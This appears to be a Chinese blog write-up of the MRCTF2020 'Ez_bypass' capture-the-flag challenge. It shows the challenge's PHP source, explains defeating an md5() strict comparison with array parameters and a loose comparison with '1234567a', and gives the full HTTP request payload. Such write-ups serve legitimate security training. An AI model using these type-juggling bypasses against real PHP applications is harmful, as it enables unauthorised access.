首页 > 其他分享 >[MRCTF2020]Ez_bypass

[MRCTF2020]Ez_bypass

时间:2023-11-02 21:44:57浏览次数:39  
标签:GET passwd echo gg bypass Ez else id MRCTF2020

打开题目后得到源码,可以使用 PHP 代码在线格式化一下,方便阅读。源码如下。

$flag = 'MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if (isset($_GET['gg']) && isset($_GET['id'])) {
    $id = $_GET['id'];
    $gg = $_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if (isset($_POST['passwd'])) {
            $passwd = $_POST['passwd'];
            if (!is_numeric($passwd)) {
                if ($passwd == 1234567) {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                } else {
                    echo "can you think twice??";
                }
            } else {
                echo 'You can not get it !';
            }
        } else {
            die('only one way to get the flag');
        }
    } else {
        echo "You are not a real hacker!";
    }
} else {
    die('Please input first');
}

可以看到,第一重是 md5() 函数的真比较,可以传入数组绕过。第二重则是弱相等,直接使变量为 1234567a 即可。Payload 如下。

POST /?id[]=1&gg[]=2 HTTP/1.1
Host: 10ab5c05-bdbc-47c9-8386-fe3b205a5a55.node4.buuoj.cn:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

passwd=1234567a

标签:GET,passwd,echo,gg,bypass,Ez,else,id,MRCTF2020
From: https://www.cnblogs.com/imtaieee/p/17806397.html

相关文章

  • [MRCTF2020]你传你呢
    打开题目如下。本题有坑点,就算是使用mspaint随意生成一个jpg图片进行上传,仍然提示:我扌yourproblem?。后面查看了wp,发现是对上传内容的大小存在限制。经尝试,使用php、phtml、php5等多种后缀都无法绕过检测,但可以上传.htaccess文件(.htaccess是Apache使用的一种配置......
  • Dezender下载及使用说明
     解压到E:\tools\DeZender\Dezender修改php5配置文件(php.ini)E:\tools\DeZender\Dezender\PHP5\PHP5\php.ini==========php.ini===========zend_extension_manager.optimizer_ts="E:\tools\Dezender\Dezender\ZendforPHP5\ZendforPHP5\Optimizer-3.3.......
  • pytorch中squeeze()和unsqueeze()函数
     下面使用一个二维矩阵看下dim不同时呈现出的效果:   #创建一个3*4的全1二维tensor   a=torch.ones(3,4)   '''   运行结果tensor([[1.,1.,1.,1.],[1.,1.,1.,1.],[1.,1.,1.,1.]])'''在0维度上插入一个维度,可以看到现在......
  • 2023QDEZ男人八题线上同步赛 赛时代码和思路
    2023QDEZ男人八题线上同步赛赛时代码和思路比赛链接;赛时答疑;洛谷博客\(\texttt{A-std}\);\(\texttt{B-std}\);\(\texttt{C-std}\);\(\texttt{D-std}\);\(\texttt{E-std}\);\(\texttt{F-std}\);\(\texttt{G-std}\);\(\texttt{H-std}\);\(\texttt{Ex-std}\)我:\(50+50+20+5......
  • ASP.NET Core – DateTime, DateTimeOffset, DateOnly, TimeOnly, TimeSpan, TimeZone
    前言心血来潮,这篇讲点基础的东西。对日期和时区TimeZone不熟悉的读者,请先看这篇 TimeZone,LeapYear,DateFormat,EpochTime时区,闰年,日期格式。 C#中的日期类型DateTime ......
  • 通过Docker搭建Debezium同步MySQL的数据变化
    Debezium是红帽开发的一款CDC产品,和阿里的Canel类似,都是同步binlog,不过强大了一点点。为了不再麻烦,下面称之为dbz。达拉崩吧斑得贝迪卜多比鲁翁...dbz的搭建依赖很多中间件:首先要有个MySQL库,dbz来读取数据库binlog(和数据库当前快照);读到后发给kafka,与kafka通信的叫connector;kaf......
  • Failed to start discovery: org.bluez.Error.InProgress
    #bluetoothctlscanonFailedtostartdiscovery:org.bluez.Error.InProgress问题背景:blueZ版本:#bluetoothd--version5.52kernel版本:4.4.13Bluetoothchipset:RTL8761B(vpid0bda:8771)问题描述:执行scan时报“Failedtostartdiscovery:org.bluez.Error.InPro......
  • duogez架构图
    duogez├──duogez-auth--授权服务提供[3000]├──duogez-common--系统公共模块├├──duogez-common-biz-alert--业务预警├├──duogez-common-bom--公共依赖版本├├──duogez-common-core--公共工具类核心包├├──duogez-common-......
  • C语言数据类型占用字节大小+modport存在的意义+传输延迟和惯性延迟+上下拉+forwarding
    C语言数据类型占用字节大小最大整形宽度是8字节。modport存在的意义似乎modport的存在没有意义了。只是将信号变得更冗长。但是又是有意义的,因为modport里的赋值变化是没有延迟的,而clocking受到配置的影响。https://blog.csdn.net/hh199203/article/details/127230498传输......
  • [swin-trans]分布式训练的debug:ValueError: Error initializing torch.distributed us
    在用torch.distributed.init_process_group(backend='nccl',init_method='env://',world_size=world_size,rank=rank)时,出现1、ValueError:Errorinitializingtorch.distributedusingenv://rendezvous:environmentvariableMASTER_ADDRexpected,b......